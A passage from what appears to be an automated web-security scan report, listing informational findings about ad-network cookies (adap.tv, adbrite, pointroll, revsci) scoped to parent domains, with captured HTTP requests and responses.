Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');

5.13. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1302352256751 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6740737079467195442__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 579

jsonp1302352256751({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirec
...[SNIP]...

5.14. http://ads.adap.tv/cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.wptz.com/news/27483035/detail.html&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="724771479354552954__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/html
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)


5.15. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0


5.16. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.17. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.18. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.19. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@3@4da052a5@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@4@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.20. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.21. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 8673
Set-Cookie:PRID=337572AE-A012-4FFC-8DD1-6EAB82E26D53; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EoHuWaH2p;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJBaEoHuWaH2pAIJBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7BA00400-6896-A97D-0309-05A002090101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzpE:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzpEFy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

5.22. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU2jPhIc1A0uGehL84pPUbKzTkRplHTtDOLcFLL20Wt/xDozbuB9JMvwkAev2DUhq9kHuGUbrEuN8ON6TNG555znQzlM/5y3Of8x/X6dKg3FnSBBN+UlVxRdchaBGHVUKje4s8VkZQWjQ1gqgAwl+iH3n81oscO5chIWRZ36CXmDSa/OTIUw7CjGsrVH7jcNbZz1+P/5Cwum4IaWC0xqWyJ6XovDln8WaROkuTy33TUAHU61RJV5ivuxthgGJTnsGP2oim8WLMsNpJJA/LXcSgIXz4hNBUU9JAy7BvTu431M47rwgvXF1wwSs8CTVlcKnpNC+IZG/etg7wJ7v5WMpOoewDSPyl+D+ZITHQGpdDrmlVCTSuWtoRAk/fynI6itvIlfPCsB7ygRb9E+JbXqiTTZnEwFnkfcUSLpfgXJjDpEUtIjl0JADwIgGt00osG49t9IyNgiq4ztSgib+W2H7G4irTT7YqeFrKAKXiduq88e4SYI3XCR7PRqRGDSkcK7fP5pU4c4mWtpSGRpuZ/jQr+avXtESVqxm1F2x/dItR5K0ra7JZEPKK5ZdfMXYyC37FPztdunoZPk7PtuCqchU5n4be66l78i37EYOhAfDWUVKTiBXLEGa8OBYj5hoUrVcM75uopbp1ssdiEnTeE0OoyiUytxJOyUR0ZlVeXCl6VK+3+b7NaC+BUqdz1dLv+wtaIRVKaV4LStSk/n; rtc_TdTG=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2tVEbZaaSakC1Vtg80jsQpMZ82Rp4QDAVMIXzRVDE7hI/n/4akBaNcbN8GzvGBHbsQslcMTLNlRxc+ltcto7W3xwlydvz273pz0jQ4SVo42FUgVfwsuTJ73/ozLa5Dj4ttdtyx4ODj0c4MRgpOcHtrA9skVdsBvJxX6IA4P/mp6sWRYt1VtUyG21pdiMr6BE2SYIYkowggle26SPHtS97hgJom9QzF+fjkdopqa/eDqJ/hP21kuB7Nj/+t5E3SpclXlyj6NaRvJGIN17eN/umzN7wv+ezazt/lwqAWGvQUyaAiuB1TVylFtLbj7I0PdOEqjxsJKcOCJZ1JhXbmC1lZ6XChDbdUhU3t+YYwB//wiNi9Ld8batKsDYTWX0W6bmAEzQjeSWzUvtoONJgOSrqzLxsH3hcVyBsoM91FthCvWkrc0GDBVSVKzEww/Vo2msH1uIHBaQx3n9e13MpFHEYrkFOPjgbLG/rl8utHLnLWo971UO7HAZDcHPxOWByvPVoV7NG0dP25vYms68CezhpoXTWHnnVCE59stFSuvSrfAPWQ6FZGAe7Bjr9EcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMNFS1sTmfkix3bXcdRC/4c17mQuMHwkssVmYY+3jS/LSNovgvkDf4Yy52ORyslLJ2KwcdH1HMx2WtoUSVh9tsdinADifa6eZOcI+g0oFmLUlkFggXnwMlg